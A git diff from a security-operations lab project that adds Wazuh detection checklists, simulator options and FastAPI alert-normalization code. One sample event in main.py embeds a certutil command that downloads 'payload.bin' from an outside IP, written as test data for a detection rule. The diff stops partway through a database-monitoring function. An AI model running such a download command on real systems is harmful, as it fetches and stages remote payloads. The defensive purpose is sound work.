rule update

overall.md

+# Overall Project Checklist vs Proposal (Revision)
+
+Reference: `Security Detection & Threat Intelligence Enhancement Proposal-revise.md`
+Updated: March 4, 2026
+
+Legend:
+- `[x]` Completed
+- `[~]` Partially completed / in progress
+- `[ ]` Not started
+
+## 1) Architecture & Core Platform
+
+- [x] Detection layer (Wazuh) deployed and integrated
+  - Evidence: `wazuh-docker/single-node/docker-compose.yml`, `compose-overrides/wazuh.shared-network.yml`
+- [x] Automation layer (Shuffle) integrated
+  - Evidence: `Shuffle/docker-compose.yml`, `scripts/update-shuffle-workflow-from-template.sh`
+- [x] Case management integrated (IRIS-web used in implementation)
+  - Evidence: `soc-integrator/app/adapters/iris.py`, `soc-integrator/app/main.py` (`/iris/tickets`)
+- [x] Escalation path (PagerDuty stub in MVP) integrated
+  - Evidence: `compose-overrides/pagerduty.stub.yml`, `soc-integrator/app/adapters/pagerduty.py`
+- [x] Orchestration/API layer (`soc-integrator`) operational
+  - Evidence: `soc-integrator/app/main.py`, `soc-integrator/app/routes/mvp.py`
+
+Note: Proposal mentions DFIRTrack in architecture section; current implementation uses IRIS-web.
+
+## 2) Scope of Work (Section 3)
+
+### 2.1 Create & Tune New Detection Rules / Use Cases
+
+- [x] Baseline rules/decoders for proposal use cases added
+  - Evidence:
+    - `wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a1-ioc-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a2-fortigate-fw-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a3-fortigate-vpn-rules.xml`
+    - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a4-windows-ad-rules.xml`
+- [~] Tuning against real production traffic
+  - Status: simulator/UAT-oriented tuning done; production false-positive tuning remains
+
+### 2.2 IOC Detection (DNS / Firewall / IDS-IPS)
+
+- [x] IOC enrichment/evaluation APIs implemented
+  - Evidence: `soc-integrator/app/main.py` (`/ioc/enrich`, `/ioc/evaluate`, `/ioc/history`)
+- [x] VirusTotal and AbuseIPDB integrations implemented
+  - Evidence: `soc-integrator/app/adapters/virustotal.py`, `soc-integrator/app/adapters/abuseipdb.py`
+- [x] IOC trace persistence implemented
+  - Evidence: `soc-integrator/app/repositories/mvp_repo.py` (`ioc_trace` methods)
+- [~] Scheduled IOC feed lifecycle hardening for production
+  - Status: core IOC workflow exists; production feed governance/SLAs still to finalize
+
+### 2.3 VPN Authentication Success from Outside Thailand
+
+- [x] MVP VPN evaluate flow implemented
+  - Evidence: `soc-integrator/app/routes/mvp.py` (`/mvp/vpn/evaluate`), `soc-integrator/app/services/mvp_service.py`
+- [x] GeoIP enrichment capability implemented
+  - Evidence: `soc-integrator/app/adapters/geoip.py`, `soc-integrator/app/main.py` (`/geoip/{ip}`)
+- [~] Production exception list and policy hardening
+  - Status: policy framework exists; enterprise exception governance pending
+
+## 3) End-to-End Workflow & Integration Deliverables (Section 4 / 4.1)
+
+- [x] Wazuh -> soc-integrator pipeline implemented
+  - Evidence: `soc-integrator/app/main.py` (`/wazuh/sync-to-mvp`, `/mvp/incidents/ingest`)
+- [x] soc-integrator -> IRIS ticket/case creation implemented
+  - Evidence: `soc-integrator/app/main.py` (`/iris/tickets`)
+- [x] soc-integrator -> Shuffle workflow trigger implemented
+  - Evidence: `soc-integrator/app/main.py` (`/shuffle/workflows/{workflow_id}/execute`)
+- [x] soc-integrator -> PagerDuty stub escalation path implemented
+  - Evidence: `soc-integrator/app/adapters/pagerduty.py`, `/action/create-incident`
+
+## 4) Appendix A (Initial Scope Use Cases)
+
+- [x] A1 DNS/Firewall IOC coverage artifacts in place
+- [x] A2 FortiGate IPS/Firewall coverage artifacts in place
+- [x] A3 FortiGate VPN coverage artifacts in place
+- [x] A4 Windows/AD coverage artifacts in place
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-a*-*.xml`
+
+## 5) Appendix B (Optional Add-On)
+
+- [x] B1 VMware rule artifact present
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b1-vmware-rules.xml`
+- [x] B2 Log loss monitoring implemented in soc-integrator
+  - Evidence: `soc-integrator/app/main.py` (`/monitor/log-loss/check`)
+- [x] B3 Sysmon rule artifact present
+  - Evidence: `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-b3-sysmon-rules.xml`
+- [x] Appendix B simulation script added
+  - Evidence: `scripts/send-wazuh-proposal-appendix-b-events.sh`
+
+## 6) Appendix C (Future Enhancements)
+
+- [x] C1 implemented (impossible travel detection logic)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py` (`C1-01`)
+- [x] C2 implemented (C2-01..C2-04)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py`
+- [x] C3 implemented (C3-01..C3-04)
+  - Evidence: `soc-integrator/app/services/c_detection_service.py`
+- [x] Appendix C simulator added
+  - Evidence: `scripts/send-wazuh-proposal-appendix-c-events.sh`
+- [ ] C4 ransomware early warning use cases
+- [ ] C5 endpoint/server anomaly use cases
+- [ ] C6 cloud/SaaS monitoring use cases
+- [ ] C7 SOC maturity monitoring use cases
+
+## 7) Dashboards, UI, and Operations
+
+- [x] Wazuh dashboard import automation added
+  - Evidence: `scripts/import-wazuh-dashboard.sh`, `scripts/events/*.ndjson`
+- [x] SOC Integrator UI implemented with monitoring and controls
+  - Evidence: `soc-integrator/app/ui/index.html`, `soc-integrator/app/ui/assets/app.js`
+- [x] Sim run control in UI (start/stop/logs)
+  - Evidence: `/sim/logs/start`, `/sim/logs/stop/{run_id}`, `/sim/logs/stop-running`, `/sim/logs/output/{run_id}`
+- [x] Wazuh Live Correlation view in Systems tab
+  - Evidence: `/sim/logs/wazuh-latest/{run_id}` + Systems UI section
+- [x] GeoIP lookup API and UI tab
+  - Evidence: `soc-integrator/app/main.py` (`/geoip/{ip}`), GeoIP tab in `/ui`
+
+## 8) Remaining Work for Production-Ready Acceptance
+
+- [~] Replace/augment lab-only assumptions (PagerDuty stub -> production PagerDuty)
+- [~] Production-grade tuning on real logs (A/B/C false positives and thresholds)
+- [~] Finalize runbooks, SLA/ownership, and exception governance
+- [~] Harden frontend dependency reliability (current UI still references external CDN scripts)
+
+## 8.1) Latest Incremental Updates (March 4, 2026)
+
+- [x] Added production-profile simulator mode for proposal scripts
+  - Evidence:
+    - `scripts/send-wazuh-proposal-required-events.sh` (`--profile=production`)
+    - `scripts/send-wazuh-proposal-appendix-b-events.sh` (`--profile=production`)
+- [x] Expanded normalization test support in SOC Integrator
+  - Evidence:
+    - `soc-integrator/app/main.py` (`GET /ingest/wazuh-alert/samples`)
+    - `soc-integrator/app/main.py` (`POST /ingest/wazuh-alert` now includes `normalized_event`)
+- [x] C1 normalization aligned to production log characteristics
+  - Evidence:
+    - `soc-integrator/app/services/mvp_service.py` (production-first C1 event typing)
+- [~] Production rule validation in Wazuh (`110xxx`) currently constrained by manager runtime instability during lab restarts
+  - Status: ingestion works; deterministic decoder/rule verification requires stable manager window.
+
+## 9) Quick Status Summary
+
+- Completed foundation and integration: **Yes**
+- Appendix A initial-scope implementation artifacts: **Present**
+- Appendix B optional add-ons: **Largely implemented in lab**
+- Appendix C future enhancements: **C1-C3 implemented; C4-C7 pending**
+- Primary gap: **production hardening, governance, and operations finalization**
+
+## 10) Mermaid: SOC Integrator C1-C3 Normalization
+
+```mermaid
+sequenceDiagram
+    participant W as Wazuh
+    participant SI as SOC Integrator API
+    participant N as normalize_wazuh_hit
+    participant C as C-Detection Service
+    participant DB as Postgres
+    participant IR as IRIS/Automation
+
+    W->>SI: Raw alert (_source.full_log, rule, agent)
+    SI->>N: Normalize raw alert
+    N-->>SI: Normalized event (asset/network/payload/risk_context)
+    SI->>C: Evaluate C1-C3 use cases
+    C->>DB: Store c_detection_events + evidence
+    C-->>SI: Matches + severity + reasoning
+    SI->>IR: Optional incident/ticket workflow
+```

progress-update.md

 #### Operational scripts
 
 - `scripts/send-wazuh-test-events.sh`
+
+---
+
+Date: March 4, 2026
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
+
+## Incremental Progress Since Previous Update (March 4, 2026)
+
+### 1) Production-Profile Simulator Payloads
+
+- Added production payload mode to proposal simulators:
+  - `scripts/send-wazuh-proposal-required-events.sh`
+  - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+- New argument:
+  - `--profile=simulation|production` (default remains `simulation`)
+- In `production` profile, simulator messages omit `section/usecase_id/usecase` markers and emit production-like key/value fields to support real parser/decoder testing.
+
+### 2) Wazuh Normalize API Improvements
+
+- Enhanced `POST /ingest/wazuh-alert` in `soc-integrator`:
+  - returns both legacy normalized shape and SOC normalized event shape.
+- Added `GET /ingest/wazuh-alert/samples` with practical sample request/response cases for:
+  - DNS IOC
+  - VMware auth
+  - Windows Sysmon
+  - C1 impossible travel
+
+### 3) C1 Normalization (Production-First)
+
+- Updated C1 normalization logic in:
+  - `soc-integrator/app/services/mvp_service.py`
+- C1 now maps from production characteristics (not only simulator markers):
+  - identity/vpn source context
+  - successful login/auth indicator
+  - user + source IP present
+  - geo context present (`country` and/or `src_lat/src_lon`)
+- Legacy `section/usecase_id` C1 markers are kept as fallback for backward compatibility.
+
+### 4) Current Validation Status
+
+- Production-profile simulator events are being sent to Wazuh successfully.
+- Some runs still show only base-rule matching during verification due to current Wazuh manager runtime instability in lab (intermittent restart/init issues), which affects deterministic decoder/rule validation windows.
+- Next validation step after stable manager window:
+  - re-run production-profile A1/B1/B2/B3 batches
+  - confirm `110xxx` production rules with consistent hit evidence.
+
+### 5) Mermaid Diagram: C1-C3 Normalization Flow (SOC Integrator)
+
+```mermaid
+flowchart LR
+    A[Wazuh Raw Alert<br/>full_log + rule + agent] --> B[POST /wazuh/sync-to-mvp<br/>or /ingest/wazuh-alert]
+    B --> C[mvp_service.normalize_wazuh_hit]
+    C --> D[KV parse from full_log<br/>src_ip user country event_type]
+    D --> E[Normalized Event Schema<br/>source event_type timestamp severity<br/>asset network payload risk_context]
+
+    E --> F{C-Detection Evaluate}
+    F --> C1[C1 Impossible Travel<br/>geo context + success login + user/src_ip]
+    F --> C2[C2 Credential Abuse<br/>off-hours / dormant / service interactive / rapid privilege]
+    F --> C3[C3 Lateral Movement<br/>multi-host auth / SMB-RDP burst / internal scan]
+
+    C1 --> G[Persist c_detection_events]
+    C2 --> G
+    C3 --> G
+    G --> H[Optional Incident Pipeline<br/>IRIS case + Shuffle + PagerDuty stub]
+```
 - `scripts/send-wazuh-endpoint-agent-test-events.sh`
 - additional simulation scripts under `scripts/` for firewall and endpoint scenarios with continuous mode enabled
 
 - Timestamp format is valid ISO-8601 after normalization
 - Sample events can be found in `wazuh-alerts-*` within expected ingestion latency
 - At least one C-use-case evaluation run confirms source contributes to detection context
+
+---
+
+Date: March 4, 2026
+Project: FoodProject SOC Platform (Wazuh + Shuffle + IRIS-web + SOC Integrator)
+
+## Git Diff Progress Summary (Base: `0de071e` -> Head: `5e215c0`)
+
+### Diff Snapshot
+
+- Base commit: `0de071e7c9327c8c9135f0c15cf80c31c9b2e59a`
+- Head commit: `5e215c0`
+- Net change: **40 files changed, 6083 insertions(+), 108 deletions(-)**
+
+### Major Progress Areas
+
+1. SOC Integrator Expansion
+
+- Added full admin UI stack:
+  - `soc-integrator/app/ui/index.html`
+  - `soc-integrator/app/ui/assets/app.js`
+  - `soc-integrator/app/ui/assets/styles.css`
+- Added Appendix C correlation/detection service:
+  - `soc-integrator/app/services/c_detection_service.py`
+- Extended API/data layers for monitoring, simulation control, IOC, and detection history:
+  - `soc-integrator/app/main.py`
+  - `soc-integrator/app/models.py`
+  - `soc-integrator/app/repositories/mvp_repo.py`
+- Added GeoIP adapter integration:
+  - `soc-integrator/app/adapters/geoip.py`
+
+2. Wazuh Simulation and Dashboard Delivery
+
+- Added Appendix-specific event generators:
+  - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+  - `scripts/send-wazuh-proposal-appendix-c-events.sh`
+- Added dashboard artifacts/import pipeline:
+  - `scripts/events/*.ndjson`
+  - `scripts/import-wazuh-dashboard.sh`
+- Added Wazuh custom decoder/rules artifacts for proposal scenarios:
+  - `wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml`
+  - `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+  - `wazuh-docker/single-node/config/wazuh_cluster/rules/soc-*.xml`
+
+### Wazuh Custom Rules Added (Current Active Set)
+
+Active custom rules are currently defined in:
+- `wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml`
+
+Rule groups/ranges implemented:
+- Base and appendix classifiers:
+  - `100200`: base marker for synthetic SOC events (`soc_mvp_test=true`)
+  - `100210`: Appendix A classifier
+  - `100220`: Appendix B classifier
+  - `100230`: Appendix C classifier
+- Appendix A:
+  - `A1` IOC/DNS: `100301-100302`
+  - `A2` FortiGate firewall/IPS/IDS: `100311-100320`
+  - `A3` VPN anomalies: `100331-100335`
+  - `A4` Windows/AD behaviors: `100341-100364`
+- Appendix B:
+  - `B1` VMware/vCenter/ESXi: `100401-100403`
+  - `B2` Log-loss monitor signal: `100411`
+  - `B3` Sysmon-focused detections: `100421-100426`
+- Appendix C (implemented scope C1-C3):
+  - `C1` Impossible travel: `100501`
+  - `C2` Credential abuse/privilege misuse: `100511-100514`
+  - `C3` Lateral movement/internal recon: `100521-100524`
+
+Operational note:
+- Split rule files under `wazuh_cluster/rules/soc-*.xml` exist as staging artifacts in this workspace; active detection content is loaded from `local_rules.xml`.
+
+3. Operations and Runtime Hardening
+
+- Updated orchestration and runtime configuration:
+  - `run-combined-stack.sh`
+  - `compose-overrides/soc-integrator.yml`
+  - `soc-integrator/Dockerfile`
+  - `soc-integrator/.env.example`
+
+### Documentation Progress Included in This Range
+
+- Added/updated proposal revision document:
+  - `Security Detection & Threat Intelligence Enhancement Proposal-revise.md`
+- Expanded progress log coverage in this file (`progress-update.md`) including:
+  - Appendix C (C1-C3) production log mapping
+  - Production data onboarding checklist
+  - Acceptance criteria for source onboarding and validation

scripts/README.md

 # Test Event Scripts
 
+## SOC Integrator UI (`Run Sim Logs`) target mapping
+
+`/ui -> Systems -> Run Sim Logs` now supports **multi-select Target** values based on selected `Script`.
+The UI starts one simulator run per selected target (except `all`, which runs a single `all` run).
+
+- `fortigate`: `all`, `501E`, `80F`, `60F`, `40F`
+- `endpoint`: `all`, `windows`, `mac`, `linux`
+- `cisco`: `all`, `asa_acl_deny`, `asa_vpn_auth_fail`, `ios_login_fail`, `ios_config_change`
+- `proposal_required`: `all`, `a1`, `a2`, `a3`, `a4`
+- `proposal_appendix_b`: `all`, `b1`, `b2`, `b3`
+- `proposal_appendix_c`: `all`, `c1`, `c2`, `c3`
+- `wazuh_test`: `all`, `ioc_dns`, `ioc_ips`, `vpn_outside_th`, `windows_auth_fail`
+
 ## Send Wazuh test events
 
 Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
 After import, open dashboard:
 
 - `SOC FortiGate Simulation Overview`
+
+## Wazuh dashboard files (detailed)
+
+Dashboard saved objects are stored in `scripts/events/*.ndjson`.
+
+- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
+  - Title: `SOC FortiGate Simulation Overview`
+  - Purpose: FortiGate simulation visibility (events over time, top devices, top event types, severity).
+  - Typical data source: `scripts/send-wazuh-fortigate-test-events.sh`
+
+- `scripts/events/wazuh-client-agents-dashboard.ndjson`
+  - Title: `SOC Client Agent Simulation Overview`
+  - Purpose: Endpoint simulation visibility for Windows/macOS/Linux agent logs.
+  - Typical data source: `scripts/send-wazuh-endpoint-agent-test-events.sh`
+
+- `scripts/events/wazuh-proposal-required-dashboard.ndjson`
+  - Title: `SOC Proposal Required Logs Overview`
+  - Purpose: Appendix A required-scope logs (A1-A4).
+  - Typical data source: `scripts/send-wazuh-proposal-required-events.sh`
+
+- `scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson`
+  - Title: `SOC Proposal Appendix A+B Overview`
+  - Purpose: Combined Appendix A and B overview, including use-case table.
+  - Typical data sources:
+    - `scripts/send-wazuh-proposal-required-events.sh`
+    - `scripts/send-wazuh-proposal-appendix-b-events.sh`
+
+- `scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson`
+  - Title: `SOC Proposal Appendix C Overview`
+  - Purpose: Appendix C MVP scope visibility (currently C1-C3 coverage).
+  - Typical data source: `scripts/send-wazuh-proposal-appendix-c-events.sh`
+
+- `scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson`
+  - Title: `SOC Proposal Custom Rules Overview`
+  - Purpose: Monitor custom proposal rules (e.g., 1003xx/1004xx families), severity, and top descriptions.
+  - Typical data source: Any simulation script that triggers proposal custom rules.
+
+### Import any dashboard file
+
+```bash
+scripts/import-wazuh-dashboard.sh scripts/events/<dashboard-file>.ndjson
+```
+
+Examples:
+
+```bash
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson
+```
+
+Optional overrides:
+
+```bash
+WAZUH_DASHBOARD_URL=https://localhost \
+WAZUH_DASHBOARD_USER=admin \
+WAZUH_DASHBOARD_PASS=SecretPassword \
+OVERWRITE=true \
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
+```
+
+### Quick troubleshooting
+
+- Verify index pattern has data in Discover: `wazuh-alerts-*`.
+- Set time range wide enough (for example `Last 24 hours`).
+- If charts are empty but raw logs exist, re-import the latest NDJSON and refresh index fields.

scripts/send-wazuh-proposal-appendix-b-events.sh

 EVENT_DELAY="${EVENT_DELAY:-0.05}"
 DRY_RUN="${DRY_RUN:-0}"
 FOREVER="false"
+PROFILE="${PROFILE:-simulation}"
 
 for arg in "${@:4}"; do
   case "${arg}" in
     --forever)
       FOREVER="true"
       ;;
+    --profile=*)
+      PROFILE="${arg#*=}"
+      ;;
     *)
       echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever]"
+      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
       exit 1
       ;;
   esac
   exit 1
 fi
 
+if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
+  echo "error: profile must be simulation or production"
+  exit 1
+fi
+
 rand_public_ip() {
   if [[ $((RANDOM % 2)) -eq 0 ]]; then
     echo "198.51.100.$((RANDOM % 240 + 10))"
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=${source} severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
 }
 
 echo "starting proposal Appendix B log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
 echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
 
 if [[ "${FOREVER}" == "true" ]]; then

scripts/send-wazuh-proposal-required-events.sh

 EVENT_DELAY="${EVENT_DELAY:-0.05}"
 DRY_RUN="${DRY_RUN:-0}"
 FOREVER="false"
+PROFILE="${PROFILE:-simulation}"
 
 for arg in "${@:4}"; do
   case "${arg}" in
     --forever)
       FOREVER="true"
       ;;
+    --profile=*)
+      PROFILE="${arg#*=}"
+      ;;
     *)
       echo "error: unexpected argument '${arg}'"
-      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever]"
+      echo "usage: scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
       exit 1
       ;;
   esac
   exit 1
 fi
 
+if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
+  echo "error: profile must be simulation or production"
+  exit 1
+fi
+
 rand_public_ip() {
   if [[ $((RANDOM % 2)) -eq 0 ]]; then
     echo "198.51.100.$((RANDOM % 240 + 10))"
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=fortigate severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=fortigate section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<190>date=$(date '+%Y-%m-%d') time=$(date '+%H:%M:%S') devname=\"${FGT_DEVNAME}\" devid=\"${FGT_DEVID}\" eventtime=$(date +%s) vd=\"root\" ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=dns severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=dns section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<189>$(date '+%b %d %H:%M:%S') ${DNS_HOST} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
 
   selector_matches "${id}" "${section}" || return 0
 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
+  local tags
+  if [[ "${PROFILE}" == "production" ]]; then
+    tags="soc_mvp_test=true source=windows severity=${severity}"
+  else
+    tags="soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
+  fi
+  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} ${tags} ${body}"
   sleep "${EVENT_DELAY}"
 }
 
 }
 
 echo "starting proposal-required log simulator"
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN}"
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
 echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
 
 if [[ "${FOREVER}" == "true" ]]; then

soc-integrator/app/main.py

 from datetime import datetime, timedelta, timezone
 from pathlib import Path
 
+from psycopg import sql
 from fastapi import Depends, FastAPI, File, HTTPException, Request, UploadFile
 from fastapi.responses import FileResponse, Response
 from fastapi.staticfiles import StaticFiles
 from app.adapters.virustotal import VirusTotalAdapter
 from app.adapters.wazuh import WazuhAdapter
 from app.config import settings
-from app.db import init_schema
+from app.db import get_conn, init_schema
 from app.models import (
     ActionCreateIncidentRequest,
     ApiResponse,
     )
 
 
-@app.post(
-    "/ingest/wazuh-alert",
-    response_model=ApiResponse,
-    summary="Normalize Wazuh alert",
-    description="Normalize a raw Wazuh alert payload into the internal ingest shape.",
-)
-async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
+def _build_wazuh_hit_from_ingest(payload: WazuhIngestRequest) -> dict[str, object]:
+    src_payload = dict(payload.payload or {})
+    src_payload.setdefault("@timestamp", datetime.now(timezone.utc).isoformat())
+    src_payload.setdefault("id", payload.alert_id)
+    src_payload.setdefault(
+        "rule",
+        {
+            "id": payload.rule_id or "unknown",
+            "level": payload.severity if payload.severity is not None else 5,
+            "description": payload.title or "Wazuh alert",
+        },
+    )
+    return {"_id": payload.alert_id or f"wazuh-{uuid.uuid4().hex[:12]}", "_source": src_payload}
+
+
+def _normalize_wazuh_ingest_payload(payload: WazuhIngestRequest) -> dict[str, object]:
     normalized = {
         "source": payload.source,
         "alert_id": payload.alert_id,
         "title": payload.title,
         "payload": payload.payload,
     }
-    return ApiResponse(data={"normalized": normalized})
+    hit = _build_wazuh_hit_from_ingest(payload)
+    normalized_event = mvp_service.normalize_wazuh_hit(hit)
+    return {
+        "normalized": normalized,
+        "normalized_event": normalized_event,
+    }
+
+
+@app.post(
+    "/ingest/wazuh-alert",
+    response_model=ApiResponse,
+    summary="Normalize Wazuh alert",
+    description="Normalize a raw Wazuh alert payload into both legacy ingest shape and SOC normalized event shape.",
+)
+async def ingest_wazuh_alert(payload: WazuhIngestRequest) -> ApiResponse:
+    return ApiResponse(data=_normalize_wazuh_ingest_payload(payload))
+
+
+@app.get(
+    "/ingest/wazuh-alert/samples",
+    response_model=ApiResponse,
+    summary="Sample normalization cases",
+    description="Return sample Wazuh event-log cases with expected normalized output for testing and integration.",
+)
+async def ingest_wazuh_alert_samples() -> ApiResponse:
+    sample_payloads = [
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110302",
+            alert_id="sample-a1-02",
+            severity=8,
+            title="A1 production: DNS IOC domain match event",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:24 dns-fw-01 soc_mvp_test=true source=dns severity=medium event_type=ioc_domain_match src_ip=10.12.132.85 ioc_type=domain ioc_value=ioc-2080.malicious.example feed=threatintel_main confidence=high action=alert",
+                "agent": {"name": "dns-fw-01", "id": "001"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110402",
+            alert_id="sample-b1-02",
+            severity=8,
+            title="B1 production: ESXi SSH enabled",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:28 esxi-01 soc_mvp_test=true source=vmware severity=medium event_type=vmware_esxi_enable_ssh action=enable service=ssh user=root host=esxi-01 src_ip=203.0.113.115",
+                "agent": {"name": "esxi-01", "id": "002"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110426",
+            alert_id="sample-b3-06",
+            severity=8,
+            title="B3 production: CertUtil download pattern",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:42:35 win-sysmon-01 soc_mvp_test=true source=windows_sysmon severity=medium event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\" src_ip=10.10.10.5",
+                "agent": {"name": "win-sysmon-01", "id": "003"},
+            },
+        ),
+        WazuhIngestRequest(
+            source="wazuh",
+            rule_id="110501",
+            alert_id="sample-c1-01",
+            severity=12,
+            title="C1 production: Impossible travel",
+            payload={
+                "@timestamp": datetime.now(timezone.utc).isoformat(),
+                "full_log": "Mar 04 09:44:10 fgt-vpn-01 source=vpn severity=high event_type=vpn_login_success event_id=4624 success=true user=alice.admin src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01",
+                "agent": {"name": "fgt-vpn-01", "id": "004"},
+            },
+        ),
+    ]
+
+    cases = []
+    for item in sample_payloads:
+        cases.append(
+            {
+                "name": str(item.alert_id),
+                "request": item.model_dump(mode="json"),
+                "result": _normalize_wazuh_ingest_payload(item),
+            }
+        )
+
+    return ApiResponse(data={"cases": cases, "count": len(cases)})
 
 
 @app.post(
 
 
 @app.get(
+    "/monitor/db/tables",
+    response_model=ApiResponse,
+    dependencies=[Depends(require_internal_api_key)],
+    summary="List database tables",
+    description="List soc-integrator PostgreSQL tables with row count and relation size.",
+)
+async def monitor_db_tables() -> ApiResponse:
+    rows: list[dict[str, object]] = []
+    with get_conn() as conn, conn.cursor() as cur:
+        cur.execute(
+            """
+            SELECT
+              t.schemaname,
+              t.tablename,
+              COALESCE(s.n_live_tup, 0)::BIGINT AS estimated_rows,
+              COALESCE(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename)), 0)::BIGINT AS size_bytes,
+              COALESCE(pg_size_pretty(pg_total_relation_size(format('%I.%I', t.schemaname, t.tablename))), '0 bytes') AS size_pretty
+            FROM pg_tables t
+            LEFT JOIN pg_stat_user_tables s
+              ON s.schemaname = t.schemaname
+             AND s.relname = t.tablename
+            WHERE t.schemaname = 'public'
+            ORDER BY t.tablename
+            """
+        )
+        tables = cur.fetchall()
+
+        for item in tables:
+            schema = str(item.get("schemaname") or "public")
+            table = str(item.get("tablename") or "")
+            if not table:
+                continue
+
+            cur.execute(
+                sql.SQL("SELECT COUNT(*) AS cnt FROM {}.{}").format(
+                    sql.Identifier(schema),
+                    sql.Identifier(table),
+                )
+            )
+            count_row = cur.fetchone() or {}
+            row_count = int(count_row.get("cnt", 0) or 0)
+
+            rows.append(
+                {
